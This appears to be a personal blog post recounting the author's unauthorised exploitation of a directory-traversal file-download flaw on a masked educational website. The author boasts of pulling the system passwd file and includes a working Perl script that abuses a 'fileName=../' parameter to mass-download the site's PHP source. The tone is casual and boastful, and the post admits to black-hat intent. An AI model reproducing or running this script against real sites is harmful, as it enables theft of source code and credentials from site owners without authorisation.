Script source code disclosure could mean full compromising

Hello,

I have been playing lately with some websites security since it was extremely bored for me after finishing my exams to have nothing better to do.. yeah I know I still got to finish the CCNA course and get over with that but call me lazy I’ve wasted alot of valuable time😦

Never mind that for a second, what I bring to you today is a closer look on websites security and what could a simple human error do with your website.

Take for example our website today, http://vulnerable.edu.xx [Link kept private for.. well, I might have some black hat touch here but I still don’t want anyone to compromise the website for fun! as we all know, it was always for “educational purposes only” :D] — the website appeared to be vulnerable to Script source code disclosure which entitled me to have a copy of every single file on the website that appeared on my crawler, including the famous ‘passwd‘ file [unfortunately the passwords were kept encrypted in the ‘shadow‘ file😦 — wasn’t hard to guess the path once I got the ability to get any file :)]

So with a fast dirty perl code I wrote on a rush (took me about half an hour to learn some basics) I managed to download a copy of my beloved PHP files that were located on that host🙂

use LWP 5.64;
use strict;
use File::Basename;

my $browser = LWP::UserAgent->new;

open (handle, 'files.txt');
mkdir "site";
chdir "./site";
while (< handle >) { #remove the spaces between handle and <>, WP parser sucks
    chomp;
    my ($filename,$directories) = fileparse("$_");
    my @dir = split('/',$directories);
    my $i = 0;
    while (@dir[$i]) {
        mkdir @dir[$i];
        chdir './'.@dir[$i];
        $i = $i + 1;
    }
    $i = $i - 1;

    my $url = 'http://vulnerable.edu.xx/common/download.php?'
    $url .= 'fileName=../' . $directories . $filename;
    print "working on " . $url ."\n";

    my $response = $browser->get($url);
    die "Can't get $url -- ", $response->status_line
    unless $response->is_success;
    die "Hey I was expecting PHP, not ", $response->content_type
    unless $response->content_type eq 'application/download';

    open (file, '>'.$filename) or die "Can't create file '$filename'";
    print file $response->content;
    close(file);

    print "saving " . $directories . $filename . "\n";

    for ($i; $i >= 0; $i--) {
        chdir('../');
    }
}
just an example, one of the folders :)

just an example, one of the folders🙂

let’s hope it’s not your site😀

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: